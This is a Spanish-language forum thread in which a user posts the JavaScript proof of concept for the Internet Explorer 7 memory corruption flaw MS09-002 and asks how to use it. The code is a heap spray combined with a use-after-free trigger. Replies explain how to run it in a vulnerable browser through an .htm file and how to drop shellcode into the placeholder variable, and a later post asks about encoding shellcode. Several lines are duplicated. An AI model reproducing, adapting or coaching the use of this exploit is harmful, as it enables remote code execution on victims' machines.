alguien me podria explicar como usar este exploit (MS Internet Explorer 7 Memory Corruption PoC (MS09-002)... no entiendo como se usa...
<script language="JavaScript">
var c="putyourshizhere-unescaped";
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xC0; i++) {
array = lh + c;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
bueno muchas gracias....
solo es un poc
del bug
no es un exploit como tal aun
del bug
no es un exploit como tal aun
Aun, si lo querés probar (entendiendo que siendo un poc no está para nada pulido) hacé que un IE vulnerable ejecute ese código en un .htm.
/edit: tenés que modificar la variable c, que contiene 'putyourshizhere-unescaped'.
/edit: tenés que modificar la variable c, que contiene 'putyourshizhere-unescaped'.
(MD5 checksum error.)
Hola,
Cómo la labor de la unescape código de ejemplo "%u56e8%u0000%u5300" ???
Cómo la labor de la unescape código de ejemplo "%u56e8%u0000%u5300" ???
